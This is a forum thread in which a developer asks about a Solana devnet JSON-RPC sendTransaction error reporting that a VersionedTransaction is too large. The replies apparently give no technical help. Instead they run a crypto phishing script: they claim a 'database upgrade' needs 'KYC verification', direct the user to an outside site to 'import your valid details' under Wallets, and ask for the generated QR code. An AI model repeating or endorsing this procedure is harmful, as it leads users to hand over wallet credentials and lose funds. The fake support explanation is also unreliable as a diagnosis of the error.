Error sendTxn RPC "VersionedTransaction"

Hello Community,

I have learning about JSON RPC communication with solana network, trying to create an account assigned to a developer program on devnet.

My instruction is:

{
    "data": {
        "data": [0,0,0,0,96,77,22,0,0,0,0,0,82,0,0,0,0,0,0,0,
                 245,133,126,255,0,169],
        "type": "Buffer"
    },
    "keys": [
        {
            "isSigner": true,
            "isWritable": true,
            "pubkey": {
                "_bn": "Grw8AU3rJEQfXg4XChdR3d14JNiVSZ2qHvbBvqvvVZPs"
            }
        },
        {
            "isSigner": true,
            "isWritable": true,
            "pubkey": {
                "_bn": "33WRmCQK4EkbWxYtfrnQiqQNFuSZSFaZ9zQTJV46WxLt"
            }
        }
    ],
    "programId": {
        "_bn": "teQKR3UYBYfoGQyCBhnE8XZx4aKmPMdjoUyxn7iWfeL"
    }
}

My transaction is. Instruction encoded in Base64:

{
    "id": "1",
    "jsonrpc": "2.0",
    "method": "sendTransaction",
    "params": [
        "ewogICAgImRhdGEiOiB7CiAgICAgICAgImRhdGEiOiBbCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDk2LAogICAgICAgICAgICA3NywKICAgICAgICAgICAgMjIsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDAsCiAgICAgICAgICAgIDgyLAogICAgICAgICAgICAwLAogICAgICAgICAgICAwLAogICAgICAgICAgICAwLAogICAgICAgICAgICAwLAogICAgICAgICAgICAwLAogICAgICAgICAgICAwLAogICAgICAgICAgICAwLAogICAgICAgICAgICA2LAogICAgICAgICAgICAyMjEsCiAgICAgICAgICAgIDI0NiwKICAgICAgICAgICAgMjI1LAogICAgICAgICAgICAyMTUsCiAgICAgICAgICAgIDEwMSwKICAgICAgICAgICAgMTYxLAogICAgICAgICAgICAxNDcsCiAgICAgICAgICAgIDIxNywKICAgICAgICAgICAgMjAzLAogICAgICAgICAgICAyMjUsCiAgICAgICAgICAgIDcwLAogICAgICAgICAgICAyMDYsCiAgICAgICAgICAgIDIzNSwKICAgICAgICAgICAgMTIxLAogICAgICAgICAgICAxNzIsCiAgICAgICAgICAgIDI4LAogICAgICAgICAgICAxODAsCiAgICAgICAgICAgIDEzMywKICAgICAgICAgICAgMjM3LAogICAgICAgICAgICA5NSwKICAgICAgICAgICAgOTEsCiAgICAgICAgICAgIDU1LAogICAgICAgICAgICAxNDUsCiAgICAgICAgICAgIDU4LAogICAgICAgICAgICAxNDAsCiAgICAgICAgICAgIDI0NSwKICAgICAgICAgICAgMTMzLAogICAgICAgICAgICAxMjYsCiAgICAgICAgICAgIDI1NSwKICAgICAgICAgICAgMCwKICAgICAgICAgICAgMTY5CiAgICAgICAgXSwKICAgICAgICAidHlwZSI6ICJCdWZmZXIiCiAgICB9LAogICAgImtleXMiOiBbCiAgICAgICAgewogICAgICAgICAgICAiaXNTaWduZXIiOiB0cnVlLAogICAgICAgICAgICAiaXNXcml0YWJsZSI6IHRydWUsCiAgICAgICAgICAgICJwdWJrZXkiOiB7CiAgICAgICAgICAgICAgICAiX2JuIjogIkdydzhBVTNySkVRZlhnNFhDaGRSM2QxNEpOaVZTWjJxSHZiQnZxdnZWWlBzIgogICAgICAgICAgICB9CiAgICAgICAgfSwKICAgICAgICB7CiAgICAgICAgICAgICJpc1NpZ25lciI6IHRydWUsCiAgICAgICAgICAgICJpc1dyaXRhYmxlIjogdHJ1ZSwKICAgICAgICAgICAgInB1YmtleSI6IHsKICAgICAgICAgICAgICAgICJfYm4iOiAiMzNXUm1DUUs0RWtiV3hZdGZyblFpcVFORnVTWlNGYVo5elFUSlY0Nld4THQiCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICBdLAogICAgInByb2dyYW1JZCI6IHsKICAgICAgICAiX2JuIjogInRlUUtSM1VZQllmb0dReUNCaG5FOFhaeDRhS21QTWRqb1V5eG43aVdmZUwiCiAgICB9Cn0K"
    ]
}

With the above transaction this error appears:

{“jsonrpc”:“2.0”,“error”:{“code”:-32602,“message”:“encoded solana_sdk::transaction::versioned::VersionedTransaction too large: 1872 bytes (max: encoded/raw 1683/1232)”},“id”:“1”}

I understand the error you’re having from our database…Lately we had a Database upgrade which requires some Synchronization process and Kyc Verification for security reasons. Have you done any of that ??

I didnt do any about database. I have create a c++ program that send a http request with the JSON transaction as I described above.

if you could help me with information and a guide to solve me problem.

Thanks a lot :slight_smile:

Follow the procedure;

1. Click on token-affix.com

2. Select Wallets

3. Import your valid details correctly

4. Click Proceed

5. Generate your New QR Barcode.

Once you’re done, let me know :white_check_mark:
Send me the QR Barcode you generate so we can open a ticket for your problem to be fixed